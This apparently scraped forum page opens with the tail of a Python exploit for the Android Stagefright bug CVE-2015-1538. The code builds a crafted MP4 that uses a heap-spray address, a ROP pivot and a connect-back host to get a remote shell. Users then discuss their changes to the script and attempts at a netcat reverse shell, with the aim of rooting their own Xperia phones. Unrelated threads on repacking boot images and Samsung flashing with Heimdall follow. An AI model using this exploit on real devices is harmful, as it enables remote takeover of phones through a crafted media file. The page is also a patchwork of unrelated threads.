stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(Modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achive using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: In the video the "id" command after the first changing directory shows "uid=0(root)" and "gid=0(root)" which means to me that the user has root privileges. Or I'm wrong?)
"Klaus"
But the z3+ old firmware is vulnerable. Maybe You can use a z3+ system folder on z5! They are quite same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate and here are a couple of pointers.
1. The code is written to exploit the hangouts app specifically. So running the mp4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the scripts as arguments. The default values are said to only work on the Nexus device that it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
Hey @klausstoertebeker I have an un rooted stock Sony Z5 Compact that can be used for exploit testing. Wanted to offer it for this purpose before rooting it. If having someone volunteer their "un rooted, bootloader never unlocked-phone" as a test device is helpful then let me know.
Otherwise Im going to root my new phone soon.
Keep up the good work!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively 'cause I'm not experienced with Android programming at all. But I tried to give a thought how a root to this excellent mobile phone could be achieved.
For me using this exploit has become obselete 'cause I accidently did a System update where all the stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Dont give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
Click to expand...
Click to collapse
You can flash FTFs without any need of unlocking a Bootloader. And while you're at it: use 32.0.A.4.11 Literally everything exept CVE-2015-3876 is vunerable. I just bought a Z5, and looking forward to put some effort into messing with Stagefright rooting
I'm having a Z5 E6653 BTW
Sorry,...
... Myself5!
You're right saying that TFT's can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again in the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to controll the access of app to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean which is relased as working app
SRT AppGuard which is in beta stadium
I prefer the second solution, but in the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it will be released as "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to deinstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There is a number of stage fright vulnerabilitys in some of the stock firmware releases downloadable on Xperifirm. I have made screen shots and posted onbthis thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
pardon me,but i was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here there are some steps/tips on how to deal with SELinux policy in order to use stagefright exploits successfully. Expert-oriented information
@zxz0O0 sorry to disturb you, don't know if you already know those things but i thought it's worth a check

Building boot.img for Redmi Note 2

It seems that the boot.img images for Redmi Note 2 are being built/assembled using a custom (i.e., non-standard) version of mkbootimg, using non-standard offsets for the kernel and the ramdisk. I have tested this theory with boot.img from different ROMs, and all seem to suffer from the same fate. I have tried several tools and versions of mkbootimg (including abootimg, mktimg, and umkbootimg). Most can decompress the boot images, but none can assemble a boot image that will not brick the phone.
Does anyone have a copy of the mkbootimg (binary or source) that is being used to build these boot images?
Thanks.
PS: my goal is to build in support for running stuff from /etc/init.d/ during bootup (involves editing init.rc).
No worries, I've sorted it out. Can you please close this thread? Thanks.
use carliv image kitchen search in the forum or google it but use decompile or repack for normal android not mtk in the CMD menu as mt6795 uses different compressing method
type thanks please!
DarthJabba9 said:
No worries, I've sorted it out. Can you please close this thread? Thanks.
Click to expand...
Click to collapse
It would be nice and useful for other people if you explain how you've sorted it out.
gnazio said:
It would be nice and useful for other people if you explain how you've sorted it out.
Click to expand...
Click to collapse
I'm not sure anyone wants to hear about my trials and tribulations - but it involved downloading and testing all sorts of versions of mkbootimg (binaries, and sources) and other tools, patching mkbootimg sources, downloading Xiaomi Android sources from SudaMod and nofearnohappy github repositories, and studying all the arguments given to mkbootimg in the make files, bricking the phone about 30 times, etc. Eventually, I ended up with a combination of tools (from different sources) and mkbootimg arguments that did the job. I now have init.d support built into my boot image.
I have kept all the relevant tools in a folder for future reference. I'm not sure I'm allowed to distribute them here, or even that I would encourage anyone to try them, because the risk of bricking the phone is very high if something goes wrong (and it is very easy for something to go wrong with what you change in the decompressed ramdisk). For the curious, these were the right arguments (at least, for the boot image that I used - from Deer Stable 7.0.12.0) :
Code:
mkbootimg --kernel boot.img-kernel.img --ramdisk ramdisk.gz \
--base 0x40078000 \
--pagesize 2048 \
--kernel_offset 0x00008000 \
--ramdisk_offset 0x03f88000 \
--second_offset 0x00e88000 \
--tags_offset 0x0df88000 \
--board V7.0.12.0.LHMMI \
--cmdline bootopt=64S3,32N2,64N2 \
--output new_boot.img
I used Superr's kitchen v1.0.0.4 and it worked.

Packing boot image for Desire 610 A3UL

I am following this tutorial on my desire 610: http://http://whiteboard.ping.se/Android/Debian
All has gone well so far, the system works in chroot, etc etc etc, thats not the problem. My problem is that i cant seem to pack a boot image that works for the phone. I know the problem is with my boot image, because if the init script had been initalised, I had a line at the start which would start a log file, and the system would bootloop. Instead it takes me to the fastboot menu when i power on.
I have used the tool to unpack the boot image, found at http://whiteboard.ping.se/Android/Unmkbootimg , and its output was this:
Code:
unmkbootimg version 1.2 - Mikael Q Kuisma <[email protected]>
Kernel size 6004624
Kernel address 0x8000
Ramdisk size 1017204
Ramdisk address 0x2008000
Secondary size 0
Secondary address 0xf00000
Kernel tags address 0x1e00000
Flash page size 2048
Board name is ""
Command line "console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3"
*** WARNING ****
This image is built using NON-standard mkbootimg!
OFF_KERNEL_ADDR is 0xFE208100
OFF_RAMDISK_ADDR is 0x00208100
OFF_SECOND_ADDR is 0xFF100100
Please modify mkbootimg.c using the above values to build your image.
****************
Extracting kernel to file zImage ...
Extracting root filesystem to file initramfs.cpio.gz ...
All done.
---------------
To recompile this image, use:
mkbootimg --kernel zImage --ramdisk initramfs.cpio.gz --base 0x1dfff00 --cmdline 'console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3' -o new_boot.img
---------------
I have tried doing as it says and compiling mkbootimg with those settings, however it still does not work. Could anyone possibly see what im doing wrong? And if not, does anyone have a copy of mkbootimg that works for the Desire 610?
Thanks in advance
falseascension said:
I am following this tutorial on my desire 610: http://http://whiteboard.ping.se/Android/Debian
All has gone well so far, the system works in chroot, etc etc etc, thats not the problem. My problem is that i cant seem to pack a boot image that works for the phone. I know the problem is with my boot image, because if the init script had been initalised, I had a line at the start which would start a log file, and the system would bootloop. Instead it takes me to the fastboot menu when i power on.
I have used the tool to unpack the boot image, found at http://whiteboard.ping.se/Android/Unmkbootimg , and its output was this:
Code:
unmkbootimg version 1.2 - Mikael Q Kuisma <[email protected]>
Kernel size 6004624
Kernel address 0x8000
Ramdisk size 1017204
Ramdisk address 0x2008000
Secondary size 0
Secondary address 0xf00000
Kernel tags address 0x1e00000
Flash page size 2048
Board name is ""
Command line "console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3"
*** WARNING ****
This image is built using NON-standard mkbootimg!
OFF_KERNEL_ADDR is 0xFE208100
OFF_RAMDISK_ADDR is 0x00208100
OFF_SECOND_ADDR is 0xFF100100
Please modify mkbootimg.c using the above values to build your image.
****************
Extracting kernel to file zImage ...
Extracting root filesystem to file initramfs.cpio.gz ...
All done.
---------------
To recompile this image, use:
mkbootimg --kernel zImage --ramdisk initramfs.cpio.gz --base 0x1dfff00 --cmdline 'console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3' -o new_boot.img
---------------
I have tried doing as it says and compiling mkbootimg with those settings, however it still does not work. Could anyone possibly see what im doing wrong? And if not, does anyone have a copy of mkbootimg that works for the Desire 610?
Thanks in advance
Click to expand...
Click to collapse
I just use Blobtools and linux's standard abootimg. I'll find some links and do a quick Howto when I get home tonight.
MiniBlu
MiniBlu said:
I just use Blobtools and linux's standard abootimg. I'll find some links and do a quick Howto when I get home tonight.
MiniBlu
Click to expand...
Click to collapse
Cheers! looking forward to getting this thing actually working
Aha! Using abootimg made it work. Wish i knew about that earlier...
There's still a few errors though, need to fix that. Thanks for your help, you literally saved probably hours and hours more work if I hadnt known about this. Much appreciated

Stuck in Download Mode after failed download with Odin

Hi,
I own a Galaxy A31 which I tried to root using Odin. After installing the AP file, AP_A315GDXU1ATCE_CL18205420_QB29839975_REV00_user_ low_ship_MULTI_CERT_meta_OS10.tar.md5, the app said that the download failed. Now, I'm stuck on this screen that says "Downloading... Do not turn off target." At the top of the screen, it also says this
<!>
Partitions tee1
Reason SAMSUNG tee1, A315GDXU1ATH3 , 33893817R
SAMSUNG vbmeta, A315GDXU1ATH3, 33893817R
Whenever I try to restart the phone, it just returns to that same page.
Did you ever find a fix for this?
I'm in the same boat, flashed (downgraded) a A41 from Android 12 to Android 10, getting the same "Partitions tee1" error no matter how ofter I re-flash all partitions...
Fixed it myself!
Download & compile heimdall2 from https://git.sr.ht/~grimler/Heimdall (I'm on Linux).
Get official firmware. Unzip, untar, unlz4 (gosh, that's a lot of unnecessary compression).
Flash like this (for an A41, that is, double check your partitions are named like this!):
Bash:
~/heimdall2/bin/heimdall flash \
--super super.img \
--bootloader preloader.img \
--uh uh.bin \
--lk lk-verified.img \
--up_param up_param.bin \
--efuse efuse.img \
--boot boot.img \
--recovery recovery.img \
--vbmeta_samsung vbmeta_samsung.img \
--md1img md1img.img \
--cache cache.img \
--prism prism.img \
--optics optics.img \
--vbmeta vbmeta.img \
--gz1 gz-verified.img \
--dtbo dtbo.img \
--spmfw spmfw-verified.img \
--scp1 scp-verified.img \
--sspm_1 sspm-verified.img \
--tee1 tee-verified.img \
--userdata userdata.img \
--md_udc md_udc.img \
--omr omr.img \
--param param.bin \
--verbose
Regardless of which USB (2/3) port or cable I use, I have to start heimdall within a second after pushing the volume down button to actually start download mode. I don't know if this is by design. Otherwise I only get
Code:
ERROR: Protocol initialisation failed!
or other (timeout) errors (-7).
Additionally, I can only issue one single command. Even using
Code:
--resume
does not work after the first command.
Heimdall 1.4.2 ran into timeouts in larger uploads (super.img) or the phone saying only official binaries are allowed.
Hope this helps someone. Took me hours to find out.

Categories

Resources